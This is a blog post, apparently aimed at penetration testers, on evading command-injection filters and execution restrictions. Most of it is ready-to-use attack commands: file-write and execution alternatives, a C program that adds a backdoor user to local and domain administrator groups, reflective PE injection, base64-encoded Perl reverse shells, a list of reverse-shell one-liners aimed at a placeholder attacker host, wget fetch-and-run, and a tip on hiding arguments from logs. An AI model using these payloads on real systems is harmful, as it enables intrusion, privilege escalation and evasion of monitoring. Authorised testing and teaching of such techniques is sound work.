Sometimes there are restrictions in place for writing or executing commands or files. For example, you may have limited shell or have found a command injection vulnerability but there are filters in place for which commands or characters you may actually run. Here are some alternatives for running commands which may help bypassing such filters:
The following are some Linux alternatives for writing to a file:
echo "hello world" > file.txt echo "hello world" | tee file.txt echo "hello world" | dd of=file.txt ex -sc 'a|hello world' -cx file.txt eval "echo 'hello world' $(echo -e "\u03e") file.txt"
The following are some Linux alternatives for appending to a file:
echo "hello world" >> file.txt eval "echo 'hello world' $(echo -e "\u03e\u03e") file.txt" sed -i "$ a hello world" file.txt
The following are some Linux alternatives for executing a file/shellscript:
bash < script.sh bash script.sh cat script.sh | bash echo "script here" | bash /path/to/script.sh eval "script here"
The following are some Windows alternatives for writing to a file:
In cmd.exe:
echo hello world > file.txtIn Powershell:
echo "hello world" | tee file.txt
The following are some Windows alternatives for executing a file:
start notepad.exe
cmd.exe /c notepad.exe
echo notepad.exe | cmd.exe
call notepad.exe
whatever\\..\\windows\\notepad
echo s = WScript.CreateObject("WScript.Shell").Run("notepad.exe") > test.vbs | cscript test.vbs
echo s = new ActiveXObject("WScript.Shell").Run("notepad.exe") > test.js | wscript test.js
One may also create a .bat file, add any of the above examples in the bat file and execute the .bat file.
In powershell you may attempt bypss restrictions for running a file as follows. Download Invoke-Reflective-PEInjection.ps1. from here and save as PEinj.ps1. Then, in powershell run:
PS X:\>. .\PEinj.ps1 PS X:\>$PE [IO.File]::ReadAllBytes(“x:\arbitraryFile.exe”) PS X:\>Invoke-ReflectivePEInjection -PEBytes $PE
A file containing the commands of choice may also be created with C code. The following example compiles an .EXE windows exectuable for creating a user called test and attempting to add the user to the both local and domain administrator groups. This may be used in conjunction with weak service configurations, in which a an .exe file location is writeable.
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
int main ()
{
int i;
i=system ("net user test !password_here_123! /add");
i=system ("net localgroup administrators ey_test /add");
i=system ("net user test_domain !password_here_123! /add /domain");
i=system ("net group administrators test_domain /add /domain");
i=system ("net group 'domain admins' test_domain /add /domain");
return 0;
}
Save the as useradd.c and compile with:
i586-mingw32msvc-gcc -o useradd.exe useradd.c
DotNetToJscript
You may also use the program DotNetToJScript to convert a csharp program to JavaScript. You begin by downloading DotNetToJScript from github. Then you open the solution and change the contents of the TestClass method inside testclass.cs to contain whatever you like such as:
Process cmd = new Process(); cmd.StartInfo.FileName = @"cmd.exe"; cmd.StartInfo.Arguments = @"/K DIR"; // <-- This will execute the command and wait to close cmd.Start(); cmd.WaitForExit();
Then you build the solution, copy ExampleAssembly.dll, Ndsk.Options.dll and DotNetToJscript to a folder. Then you run :
DotNetToJScript.exe ExampleAssembly.dll --lang=Jscript --ver=v4 -o cmd.js
Through doubleclicking cmd.js you will now start a cmd.exe console which runs dir.
Bypassing filters with encoding
Sometimes you may have to encode a command to bypass filters. This could be particularly true in web applications, in which a command injection may be present, but the injectible characters are limited.
Linux
Running an encoded command on a server requires the server to be able to perform decoding. There are a number of different decoder options available in Linux, generally including the following commands:
base64 -d openssl enc -base64 -d python -m base64 -d openssl base64 -e perl -MMIME::Base64 -ne 'printf "%s\n",decode_base64($_)'
Each of the options above may then be used to run commands with the following syntax:
<encoded code> | <decoder> | <program to run code>
For example, the following PERL example creates a reverse shell that connects to localhost on port 7000:
echo 'use Socket;$i="localhost";$p=7000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' | base64 -w0
This will output the following base64 encoding:
dXNlIFNvY2tldDskaT0ibG9jYWxob3N0IjskcD03MDAwO3NvY2tldChTLFBGX0lORVQsU09DS19TVFJF QU0sZ2V0cHJvdG9ieW5hbWUoInRjcCIpKTtpZihjb25uZWN0KFMsc29ja2FkZHJfaW4oJHAsaW5ldF9 hdG9uKCRpKSkpKXtvcGVuKFNURElOLCI+JlMiKTtvcGVuKFNURE9VVCwiPiZTIik7b3BlbihTVERFUlIsIj4mUyIpO2V4ZWMoIi9iaW4vc2ggLWkiKTt9Owo=
To run this code on a Linux server with base64 command present, the following command may be used:
echo dXNlIFNvY2tldDskaT0ibG9jYWxob3N0IjskcD03MDAwO3NvY2tldChTLFBGX0lORVQsU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoInRjcCIpKTtpZihjb25uZWN0KFMsc29ja2FkZHJfaW4oJHAsaW5ldF9hdG9uKCRpKSkpKXtvcGVuKFNURElOLCI+JlMiKTtvcGVuKFNURE9VVCwiPiZTIik7b3BlbihTVERFUlIsIj4mUyIpO2V4ZWMoIi9iaW4vc2ggLWkiKTt9Owo= | base64 -d | perl
If a netcat i listening on port 7000, a reverse shell will popup. Note that base64 -d may be replaced with any decoding program, and perl may be replaced with any program lanuage that is used. For any program executbale directly with bash the following would be used:
To encode:
echo -e "nc -e /bin/sh localhost 7000" | base64 -w0
To decode and run:
echo bmMgLWUgL2Jpbi9zaCBLYWxpX2lwIEthbGlfcG9ydAo= | base64 -d | bash
Should for some reason the “|” (%7C url encoded) character be restricted, here are some alternatives for accomplishing the same task as above:
base64 -d <(echo bmMgLWUgL2Jpbi9zaCBLYWxpX2lwIEthbGlfcG9ydAo=) eval "echo bmMgLWUgL2Jpbi9zaCBLYWxpX2lwIEthbGlfcG9ydAo=) $(echo -e "\u07c") base64 -d" echo bmMgLWUgL2Jpbi9zaCBLYWxpX2lwIEthbGlfcG9ydAo= > /tmp/file;eval "base64 -d /tmp/file"
Another option if neither | or > is allowed is to convert a file you know that contents of to base64 with openssl, then use sed and replace its content with the base64 string you would like and then convert it to plaintext using openssl:
cat somefile
something
openssl enc-base64 -d -in somefile.txt -out somefile.b64
c29tZXRoaW5nCg==
sed -i 's-c29tZXRoaW5nCg==-dXNlIFNvY2tldDskaT0ibG9jYWxob3N0IjskcD03MDAwO3NvY2tldChTLFBGX0lORVQsU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoInRjcCIpKTtpZihjb25uZWN0KFMsc29ja2FkZHJfaW4oJHAsaW5ldF9hdG9uKCRpKSkpKXtvcGVuKFNURElOLCI+JlMiKTtvcGVuKFNURE9VVCwiPiZTIik7b3BlbihTVERFUlIsIj4mUyIpO2V4ZWMoIi9iaW4vc2ggLWkiKTt9Owo=-g' somefile.b64
cat somefile.b64
dXNlIFNvY2tldDskaT0ibG9jYWxob3N0IjskcD03MDAwO3NvY2tldChTLFBGX0lORVQsU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoInRjcCIpKTtpZihjb25uZWN0KFMsc29ja2FkZHJfaW4oJHAsaW5ldF9hdG9uKCRpKSkpKXtvcGVuKFNURElOLCI+JlMiKTtvcGVuKFNURE9VVCwiPiZTIik7b3BlbihTVERFUlIsIj4mUyIpO2V4ZWMoIi9iaW4vc2ggLWkiKTt9Owo=
openssl enc -base64 -d -in somefile.b64 -out s.py
cat s.py
use Socket;$i="localhost";$p=7000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
If allowed, you could also use wget to fetch the contens of any file. To limit the amount of characters needed in such a command you simply change the name of the script to index.html. Then wget file fetch index.html with
wget 192.168.1.100
Afterwards, you simply run the fetched script with
python index.html
NB: using a pipe is often more stealthier as it hides “suspicious” arguments in logs etc.
The following list provides an overview of how to do the same with various programming languages. Simple match replace Kali_ip and Kali_port with ip address and port of listener respectively. Although the oneliners below would work as they are, when using encoding/decoding – only the code before the last pipe in the oneliners below should be encoded. The last pipe and program to run the code is only added after the decoding command (for example, base64 -d):
Python echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Kali_ip",Kali_port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' | pythonPerl echo 'use Socket;$i="Kali_ip";$p=Kali_port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' | perlPHP echo '$sock=fsockopen("Kali_ip",Kali_port);exec("/bin/bash -i <&3 >&3 2>&3");' > code.pl | php -aRuby echo 'f=TCPSocket.open("Kali_ip",Kali_port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' | ruby -rsocketBash and Netcat echo 'nc -e /bin/sh Kali_ip Kali_port' | bash Bash only echo 'bash -i >& /dev/tcp/Kali_ip/Kali_port 0>&1' | bash SH only echo 'sh -i >& /dev/tcp/Kali_ip/Kali_port 0>&1' | sh
Note, although web applications usually accept full base64, running programs through a decoder is not limited to base64, it is merely provided here as guidance. HEX or Binary are other options.
Windows
On Windows there are less options to run base64 commands. For example in Powershell one can run notepad (or any other windows command including arguments) the following way:
powershell -enc bgBvAHQAZQBwAGEAZAA=
To encode a command in the right format (BASE64 UTF16 LITTLE ENDIAN) one simple way is:
[convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("notepad"))
To use a longer example that writes hello world to a file (hello.txt) and opens this in notepad use:
Encode
[convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("echo 'hello world' | tee hello.txt ; notepad hello.txt"))
Decode
powershell -enc ZQBjAGgAbwAgACcAaABlAGwAbABvACAAdwBvAHIAbABkACcAIAB8ACAAdABlAGUAIABoAGUAbABsAG8ALgB0AHgAdAAgADsAIABuAG8AdABlAHAAYQBkACAAaABlAGwAbABvAC4AdAB4AHQA
One could also use certutil as a base64 encoder/decoder of files. You could for example write your command into a file (test.cmd below) and then use certutil to encode it. Then, decode it on another system and run it. You could include long and complex commands this way that may otherwise break due to character restrictions, new lines etc. Note that this could be done for most files, including PowerShell etc.
Encode echo notepad > test.cmd certutil -encode test.cmd testEnc.txt type testEnc.txt -----BEGIN CERTIFICATE----- bm90ZXBhZCAgDQo= -----END CERTIFICATE----- Decode certutil -decode testEnc.txt testDec.cmd Run notepad example echo -----BEGIN CERTIFICATE----- > tmp.txt echo bm90ZXBhZCAgDQo= >> tmp.txt echo -----END CERTIFICATE----- >> tmp.txt certutil -decode tmp.txt testDec.cmd testDec.cmd
Happy ethical hacking
One Reply to “Bypassing command restrictions and filters”